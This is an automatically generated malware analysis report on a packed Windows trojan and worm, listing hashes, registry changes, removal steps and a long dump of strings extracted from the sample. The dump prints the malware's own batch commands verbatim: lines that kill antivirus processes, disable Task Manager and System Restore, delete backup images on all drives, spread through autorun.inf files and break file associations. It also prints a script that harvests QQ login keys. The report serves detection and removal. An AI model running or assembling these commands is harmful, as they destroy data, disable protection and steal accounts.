HEUR:Trojan.Win32.Generic (Kaspersky), Generic.Malware.SFMDYBVd.B6FAF71C (B) (Emsisoft), Generic.Malware.SFMDYBVd.B6FAF71C (AdAware), Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, GenericAutorunWorm.YR, GenericInjector.YR (Lavasoft MAS)Behaviour: Trojan, Worm, EmailWorm, WormAutorun
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 0a9ae60a1507dc9b0141dcb01ee413f6
SHA1: 296c491c9a00b5c9f4e825b6e2e3ecb2994cb742
SHA256: 8ce272c3e085a9f8da14abc2f56747ec9e50b771a2471e8c5e80cc664ec2e092
SSDeep: 6144:Zq9Eypeh23JV66dr1p VOWliICbpJouNjbb1FSEBqVg88GqgQxY8oEpeb:Q9N3JV6kr1cVOWdCLFfXf88GqgQxgEp
Size: 304640 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PackerUPXCompresorGratuitowwwupxsourceforgenet, UPolyXv05_v6
Company: AirInstaller
Created at: 2013-08-20 20:07:35
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
Behaviour | Description |
---|---|
EmailWorm | Worm can send e-mails. |
WormAutorun | A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer. |
Process activity
The Trojan creates the following process(es):No processes have been created.The Trojan injects its code into the following process(es):
%original file name%.exe:1808
File activity
The process %original file name%.exe:1808 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\slear.exe (1425 bytes)
Registry activity
The process %original file name%.exe:1808 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3A AD 27 89 AD 3E 4B 95 FA C7 91 0A 48 3B 37 B5"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"slear.exe" = "c:\windows\system32\slear.exe"
Dropped PE files
There are no dropped PE files.
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%System%\slear.exe (1425 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"slear.exe" = "c:\windows\system32\slear.exe" - Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: 2013????
Product Name: ??????
Product Version: 1.6.0.0
Legal Copyright: 2013???? ????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.6.0.0
File Description: 2013
Comments: ??????????(http://www.eyuyan.com)
Language: English (United States)
Company Name: 2013????Product Name: ??????Product Version: 1.6.0.0Legal Copyright: 2013???? ????Legal Trademarks: Original Filename: Internal Name: File Version: 1.6.0.0File Description: 2013Comments: ??????????(http://www.eyuyan.com)Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
UPX0 | 4096 | 651264 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
UPX1 | 655360 | 290816 | 287232 | 5.49421 | 5f1aeacec80e299b97a3c0be6a619a2c |
.rsrc | 946176 | 16384 | 16384 | 2.49987 | e2784112b04c223b0d25494fb365f9a9 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 1
caf03e9cc3118627cd7c3d133a311224
Network Activity
URLs
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_1808:
`.rsrc
`.rsrc
t$(SSh
t$(SSh
~%UVW
~%UVW
u$SShe
u$SShe
atl.dll
atl.dll
wininet.dll
wininet.dll
kernel32.dll
kernel32.dll
advapi32.dll
advapi32.dll
NTDLL.DLL
NTDLL.DLL
HttpOpenRequestA
HttpOpenRequestA
HttpSendRequestA
HttpSendRequestA
HttpQueryInfoA
HttpQueryInfoA
sleartest.exe
sleartest.exe
dll.bat
dll.bat
\*.dll
\*.dll
exe.bat
exe.bat
\*.exe
\*.exe
&keyindex=9&pt_aid=549000912&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone
&keyindex=9&pt_aid=549000912&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone
&clientkey=
&clientkey=
http://ptlogin2.qq.com/jump?clientuin=
http://ptlogin2.qq.com/jump?clientuin=
http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone
http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone
skey=
skey=
#home&syn_tweet_verson=1&richtype=&richval=&special_url=&subrichtype=&who=1&con=qm
#home&syn_tweet_verson=1&richtype=&richval=&special_url=&subrichtype=&who=1&con=qm
qzreferrer=http://user.qzone.qq.com/
qzreferrer=http://user.qzone.qq.com/
http://taotao.qq.com/cgi-bin/emotion_cgi_publish_v6?g_tk=
http://taotao.qq.com/cgi-bin/emotion_cgi_publish_v6?g_tk=
qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/profile/profile.html?tab=base&nickname=
qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/profile/profile.html?tab=base&nickname=
http://w.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=
http://w.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=
qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/profile/profile.html?tab=space&spacename=
qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/profile/profile.html?tab=space&spacename=
http://w.cnc.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=
http://w.cnc.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=
SSOAxCtrlForPTLogin.SSOForPTLogin2
SSOAxCtrlForPTLogin.SSOForPTLogin2
http://xui.ptlogin2.qq.com/cgi-bin/qlogin
http://xui.ptlogin2.qq.com/cgi-bin/qlogin
document.body.innerHTML=GetuinKey();
document.body.innerHTML=GetuinKey();
function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g<f><pre>Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)</pre><pre>http=</pre><pre>https</pre><pre>HTTP/1.1</pre><pre>Content-Type: application/x-www-form-urlencoded</pre><pre>HTTP/1.1</pre><pre>http://</pre><pre>len = str.length; i < len; i) hash = (hash << 5) str.charCodeAt(i);</pre><pre>var t = QZONE.FormSender;</pre><pre>if (t && t.pluginsPool) t.pluginsPool.formHandler.push(function(fm) {</pre><pre>var a = QZFL.string.trim(fm.action);</pre><pre>a = (a.indexOf("?") > -1 ? "&": "?") "g_tk=" QZFL.pluginsDefine.getACSRFToken();</pre><pre>fm.action = a</pre><pre>slear && del / f / s / q c:\slear.bat</pre><pre>c:\slear.bat</pre><pre>cmd.exe</pre><pre>c:\windows\system\shutdown.bat</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Run\slear.exe</pre><pre>reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "reboot_system" /t REG_SZ /d "shutdown -s -t 0"</pre><pre>del :\forshotdown.cmd</pre><pre>shutdown -s -t 0 && del / f / s / q c:\slear.bat</pre><pre>c:\windows\system32\slear.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr</pre><pre>http://www.shafou.com</pre><pre>copy %0 %windir%\system32\cmd.bat</pre><pre>attrib %windir%\system32\cmd.bat r s h</pre><pre>%s% /im pfw.exe shadowtip.exe shadowservice.exe qq.exe explorer.exe IEXOLORE.EXE /f >nul</pre><pre>%s% /im norton* /f >nul</pre><pre>%s% /im av* /f >nul</pre><pre>%s% /im fire* /f >nul</pre><pre>%s% /im anti* /f >nul</pre><pre>%s% /im spy* /f >nul</pre><pre>%s% /im bullguard /f >nul</pre><pre>%s% /im PersFw /f >nul</pre><pre>%s% /im KAV* /f >nul</pre><pre>%s% /im ZONEALARM /f >nul</pre><pre>%s% /im SAFEWEB /f >nul</pre><pre>%s% /im OUTPOST /f >nul</pre><pre>%s% /im nv* /f >nul</pre><pre>%s% /im nav* /f >nul</pre><pre>%s% /im F-* /f >nul</pre><pre>%s% /im ESAFE /f >nul</pre><pre>%s% /im cle /f >nul</pre><pre>%s% /im BLACKICE /f >nul</pre><pre>%s% /im def* /f >nul</pre><pre>%s% /im 360safe.exe /f >nul</pre><pre>REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /v</pre><pre>REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d</pre><pre>REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRecentDocsMenu /t</pre><pre>REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d</pre><pre>REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Disableregistrytools /t</pre><pre>REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetHood /t REG_DWORD /d</pre><pre>REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V NoDesktop /t REG_DWORD /d</pre><pre>REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d</pre><pre>REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d</pre><pre>REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD</pre><pre>REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogOff /t REG_DWORD /d</pre><pre>REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskBar /t REG_DWORD</pre><pre>REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" "NT\CurrentVersion\SystemRestore /v DisableSR /t REG_DWORD /d</pre><pre>REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows" "NT\SystemRestore /v DisableConfig /t REG_DWORD /d</pre><pre>REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v RestrictRun /t REG_DWORD /d</pre><pre>for %%c in (c %alldrive%) do del %%c:\*.gho /f /s /q >nul</pre><pre>echo @echo off >d:\setup.bat</pre><pre>!^.^ >>d:\setup.bat</pre><pre>echo copy d:\setup.bat c:\Documents" "and" "Settings\All" "Users\</pre><pre>\a.bat >>d:\setup.bat</pre><pre>echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat</pre><pre>/f >>d:\setup.bat</pre><pre>echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat</pre><pre>echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat</pre><pre>HKEY_CLASSES_ROOT\batfile\shell\open\command /v setup.bat /t REG_SZ /d d:\setup.bat /f >>d:\setup.bat</pre><pre>echo [windows] >> %windir%\win.ini</pre><pre>echo run=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini</pre><pre>echo load=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini</pre><pre>echo [boot] >> %windir%\system.ini</pre><pre>echo shell=explorer.exe setup.bat C:\AUTOEXEC.BAT >> %windir%\system.ini</pre><pre>echo [AutoRun] >d:\autorun.inf</pre><pre>echo Open=setup.bat >>d:\autorun.inf</pre><pre>echo Open=system.bat >>d:\autorun.inf</pre><pre>attrib d:\autorun.inf r s h >>d:\setup.bat</pre><pre>attrib d:\setup.bat r s h >>d:\setup.bat</pre><pre>start d:\setup.bat /min >nul</pre><pre>echo @echo off >>C:\AUTOEXEC.BAT</pre><pre>echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d</pre><pre>C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT</pre><pre>echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d</pre><pre>REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v AUTOEXEC.BAT /t REG_SZ /d</pre><pre>/f >>C:\AUTOEXEC.BAT</pre><pre>REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat</pre><pre>echo if not d:\setup.bat start %windir%\system32\cmd.bat /min >>C:\AUTOEXEC.BAT</pre><pre>copy %0 %systemroot%\windows.bat >nul</pre><pre>if not exist %windir%/system32/explorer.bat @echo off >>%windir%/system32/explorer.bat</pre><pre>if not exist C:\AUTOEXEC.BAT start %windir%\system32\cmd.bat /min >>%windir%/system32/explorer.bat</pre><pre>if not exist %windir%\system32\cmd.bat start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat</pre><pre>C:\AUTOEXEC.BAT /f >>%windir%/system32/explorer.bat</pre><pre>/f >>%windir%/system32/explorer.bat</pre><pre>echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %</pre><pre>windir%/system32/explorer.bat/f >>%windir%/system32/explorer.bat</pre><pre>echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %</pre><pre>windir%/system32/explorer.bat /f >>%windir%/system32/explorer.bat</pre><pre>echo start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat</pre><pre>attrib %windir%/system32/explorer.bat r s h%</pre><pre>attrib %systemroot%/windows.bat r s h</pre><pre>for %%c in (%alldrive%) do echo @echo off >>%%c:\system.bat</pre><pre>for %%c in (%alldrive%) do echo start %windir%\system32\cmd.bat /min >>%%c:\system.bat</pre><pre>for %%c in (%alldrive%) do echo attrib system.bat r s h >>%%c:\system.bat</pre><pre>for %%c in (%drive%) do echo [AuroRun] >%%c:\autorun.inf</pre><pre>for %%c in (%drive%) do echo Open=system.bat >>%%c:\autorun.inf</pre><pre>copy %0 d:\Program" "Files\run.bat</pre><pre>for %%c in (%alldrive%) do echo if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min</pre><pre>>>%%c:\system.bat</pre><pre>for %%c in (%alldrive%) do attrib autorun.inf r s h >>%%c:\system.bat</pre><pre>for %%c in (%alldrive%) do attrib %%c:\autorun.inf r s h >nul</pre><pre>for %%c in (%alldrive%) do attrib %%c:\system.bat r s h >nul</pre><pre>if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min >>d:\setup.bat</pre><pre>attrib d:\Program" "Files\run.bat r s h >nul</pre><pre>http://www.hackbase.com/subject/2009-09-21/16408.htmlc:\kill.bat</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun</pre><pre>SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind</pre><pre>SOFTWARE\360Safe\safemon\ExecAccess</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop</pre><pre>Software\Policies\Microsoft\Windows\System\DisableCMD</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu</pre><pre>Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRealMode</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{36FC9E60-C465-11CF-8056-444553540000}\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E965-E325-11CE-BFC1-08002BE10318}\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E969-E325-11CE-BFC1-08002BE10318}\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96A-E325-11CE-BFC1-08002BE10318}\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96B-E325-11CE-BFC1-08002BE10318}\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96F-E325-11CE-BFC1-08002BE10318}\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11CE-BFC1-08002BE10318}\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmboot.sys\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmio.sys\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmload.sys\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ip6fw.sys\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sys\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sr.sys\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Tcpip\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdpipe.sys\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdtcp.sys\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vga.sys\</pre><pre>SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys\</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders</pre><pre>assoc .exe=nullfile</pre><pre>assoc .reg=nullfile</pre><pre>assoc .bat=nullfile</pre><pre>assoc .cmd=nullfile</pre><pre>assoc .vbs=nullfile</pre><pre>assoc .txt=nullfile</pre><pre>assoc .com=nullfile</pre><pre>reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\BlueStacks" /f</pre><pre>reg delete "HKEY_CLASSES_ROOT\bluestacks" /f</pre><pre>reg delete "HKEY_CLASSES_ROOT\BlueStacks.Apk" /f</pre><pre>@reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d 00000001 /fc:\guanlian.bat</pre><pre>goto 22c:\slears.bat</pre><pre>.slear</pre><pre>d:\sleartest.exe</pre><pre>adm-music.com</pre><pre>O%u,%</pre><pre>J÷%</pre><pre>ul3PIDL7g7IDSO3lNfL4S7NfzpDVNfc4i7NfE447NftpZ7Nf84h7NfdEv4VdEEqpVdBET4VdSOXpVdWEk4VdoOc4VdoOU4VdWE74VdzO6pVdbEr4Vdf8V0IDoZf0IDD8oP</pre><pre>fEQ8HCD8Q4NfR4b7NfJ477Nftph4VdgEw4VdEED4VddEv4VdeE94VdJEhpVdbECHVdAEU4VdrOypVdlE6pVdoOc4VdfESPID78E0IDNZjP</pre><pre>c:\windows\system32\</pre><pre>F%*.*f</pre><pre>CNotSupportedException</pre><pre>commctrl_DragListMsg</pre><pre>Afx:%x:%x:%x:%x:%x</pre><pre>Afx:%x:%x</pre><pre>COMCTL32.DLL</pre><pre>CCmdTarget</pre><pre>__MSVCRT_HEAP_SELECT</pre><pre>user32.dll</pre><pre>iphlpapi.dll</pre><pre>SHLWAPI.dll</pre><pre>MPR.dll</pre><pre>VERSION.dll</pre><pre>WSOCK32.dll</pre><pre>.PAVCException@@</pre><pre>.PAVCNotSupportedException@@</pre><pre>.PAVCFileException@@</pre><pre>(*.prn)|*.prn|</pre><pre>(*.*)|*.*||</pre><pre>Shell32.dll</pre><pre>Mpr.dll</pre><pre>Advapi32.dll</pre><pre>User32.dll</pre><pre>Gdi32.dll</pre><pre>Kernel32.dll</pre><pre>(&07-034/)7 '</pre><pre>?? / %d]</pre><pre>%d / %d]</pre><pre>: %d]</pre><pre>(*.WAV;*.MID)|*.WAV;*.MID|WAV</pre><pre>(*.WAV)|*.WAV|MIDI</pre><pre>(*.MID)|*.MID|</pre><pre>(*.txt)|*.txt|</pre><pre>(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG</pre><pre>(*.JPG)|*.JPG|BMP</pre><pre>(*.BMP)|*.BMP|GIF</pre><pre>(*.GIF)|*.GIF|</pre><pre>(*.ICO)|*.ICO|</pre><pre>(*.CUR)|*.CUR|</pre><pre>%s:%d</pre><pre>windows</pre><pre>out.prn</pre><pre>%d.%d</pre><pre>%d / %d</pre><pre>%d/%d</pre><pre>Bogus message code %d</pre><pre>(%d-%d):</pre><pre>%ld%c</pre><pre>www.dywt.com.cn</pre><pre>%s <%s></pre><pre>Reply-To: %s</pre><pre>From: %s</pre><pre>To: %s</pre><pre>Subject: %s</pre><pre>Date: %s</pre><pre>Cc: %s</pre><pre>%a, %d %b %Y %H:%M:%S</pre><pre>SMTP</pre><pre>.PAVCObject@@</pre><pre>.PAVCSimpleException@@</pre><pre>.PAVCMemoryException@@</pre><pre>.?AVCNotSupportedException@@</pre><pre>.PAVCResourceException@@</pre><pre>.PAVCUserException@@</pre><pre>.?AVCCmdTarget@@</pre><pre>.?AVCCmdUI@@</pre><pre>.?AVCTestCmdUI@@</pre><pre>.PAVCArchiveException@@</pre><pre>zcÁ</pre><pre>c:\%original file name%.exe</pre><pre>#include "l.chs\afxres.rc" // Standard components</pre><pre>GetCPInfo</pre><pre>WinExec</pre><pre>GetProcessHeap</pre><pre>RegOpenKeyExA</pre><pre>RegCreateKeyA</pre><pre>RegDeleteKeyA</pre><pre>RegCreateKeyExA</pre><pre>RegCloseKey</pre><pre>GetViewportExtEx</pre><pre>ScaleViewportExtEx</pre><pre>SetViewportExtEx</pre><pre>OffsetViewportOrgEx</pre><pre>SetViewportOrgEx</pre><pre>GetViewportOrgEx</pre><pre>ShellExecuteA</pre><pre>GetKeyState</pre><pre>SetWindowsHookExA</pre><pre>GetKeyboardLayout</pre><pre>VkKeyScanExA</pre><pre>keybd_event</pre><pre>CreateDialogIndirectParamA</pre><pre>UnhookWindowsHookEx</pre><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.rsrc</pre><pre>.W %C</pre><pre>%.wbe</pre><pre><?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.1.0.0" type="win32" /><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>PAD</pre><pre>KERNEL32.DLL</pre><pre>ADVAPI32.dll</pre><pre>COMCTL32.dll</pre><pre>comdlg32.dll</pre><pre>GDI32.dll</pre><pre>ole32.dll</pre><pre>OLEAUT32.dll</pre><pre>RASAPI32.dll</pre><pre>SHELL32.dll</pre><pre>USER32.dll</pre><pre>WININET.dll</pre><pre>WINMM.dll</pre><pre>WINSPOOL.DRV</pre><pre>WS2_32.dll</pre><pre>(*.*)</pre><pre>1.6.0.0</pre><pre>(http://www.eyuyan.com)</pre><b>%original file name%.exe_1808_rwx_00401000_000E4000:</b><pre>t$(SSh</pre><pre>~%UVW</pre><pre>u$SShe</pre><pre>atl.dll</pre><pre>wininet.dll</pre><pre>kernel32.dll</pre><pre>advapi32.dll</pre><pre>NTDLL.DLL</pre><pre>HttpOpenRequestA</pre><pre>HttpSendRequestA</pre><pre>HttpQueryInfoA</pre><pre>sleartest.exe</pre><pre>dll.bat</pre><pre>\*.dll</pre><pre>exe.bat</pre><pre>\*.exe</pre><pre>&keyindex=9&pt_aid=549000912&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone</pre><pre>&clientkey=</pre><pre>http://ptlogin2.qq.com/jump?clientuin=</pre><pre>http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone</pre><pre>skey=</pre><pre>#home&syn_tweet_verson=1&richtype=&richval=&special_url=&subrichtype=&who=1&con=qm</pre><pre>qzreferrer=http://user.qzone.qq.com/</pre><pre>http://taotao.qq.com/cgi-bin/emotion_cgi_publish_v6?g_tk=</pre><pre>qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/profile/profile.html?tab=base&nickname=</pre><pre>http://w.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=</pre><pre>qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/profile/profile.html?tab=space&spacename=</pre><pre>http://w.cnc.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=</pre><pre>SSOAxCtrlForPTLogin.SSOForPTLogin2</pre><pre>http://xui.ptlogin2.qq.com/cgi-bin/qlogin</pre><pre>document.body.innerHTML=GetuinKey();</pre><pre>function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g<f><pre>Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)</pre><pre>http=</pre><pre>https</pre><pre>HTTP/1.1</pre><pre>Content-Type: 